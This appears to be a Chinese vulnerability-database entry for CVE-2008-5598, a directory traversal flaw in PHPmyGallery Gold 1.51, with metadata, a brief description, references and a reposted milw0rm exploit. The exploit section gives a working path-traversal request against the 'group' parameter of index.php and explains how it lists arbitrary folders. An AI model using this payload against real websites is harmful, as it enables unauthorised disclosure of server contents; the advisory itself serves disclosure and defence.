PHPmyGallery 'index.php' 目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116960 漏洞类型 路径遍历
发布时间 2008-12-07 更新时间 2009-01-29
CVE编号 CVE-2008-5598 CNNVD-ID CNNVD-200812-283
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/7377
https://cxsecurity.com/issue/WLB-2008120044
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-283
|漏洞详情
PHPmyGallery是一款单用户的易于理解的后台图像管理工具。PHPmyGallery1.51gold的index.php中存在目录遍历漏洞。远程攻击者可以借助集体参数中的一个..,列出任意目录。
|漏洞EXP
############### Yee7.Com ###############
             ############### zAx #################
        PHPmyGallery Gold 1.51 (index.php) Folders Disclosure
 -----------------------------------------------------------------------------------------------------------

 [+] Script        : PHPmyGallery Gold 1.51
 [+] Vuln.          : Folders Disclosure
 [+] Download :http://phpmygallery.kapierich.net/en/downloads/
 [+] Discovered By  :         zAx [ThE-zAx@Hotmail.Com]
 [+] Team:  Electronic Security Team (Yee7.Com)

Exploit : http://site/phpmygallery/index.php?group=../somefolder

 [+]Somefolder is any folder in the vulnerable website
 [+] ../ = Up from this folder
 [+] You can see all folders those are in "somefolder"


[+] Important : This vulnerability is Discovered By Yee7-Team, By [ zAx ] and [ ShockShadow ]

# milw0rm.com [2008-12-07]
|参考资料

来源:BID
名称:32678
链接:http://www.securityfocus.com/bid/32678
来源:MILW0RM
名称:7377
链接:http://www.milw0rm.com/exploits/7377
来源:SREASON
名称:4760
链接:http://securityreason.com/securityalert/4760